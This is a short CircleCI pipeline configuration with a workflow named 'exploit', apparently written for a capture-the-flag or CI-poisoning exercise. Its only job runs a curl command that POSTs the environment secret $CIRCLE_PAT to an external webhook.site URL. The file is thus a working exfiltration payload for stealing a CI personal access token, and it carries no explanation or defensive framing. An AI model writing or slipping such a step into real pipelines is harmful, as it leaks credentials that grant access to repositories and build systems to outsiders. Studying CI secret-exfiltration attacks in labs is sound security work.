version: 2.1

jobs:
  flag:
    docker:
      - image: cimg/base:stable
    steps:
      - run:
          name: send flag
          command: curl -fsS -X POST "https://webhook.site/cc716468-1dd5-4797-bd3e-e5da485079a2" --data-urlencode "flag=$CIRCLE_PAT"

workflows:
  exploit:
    jobs:
      - flag
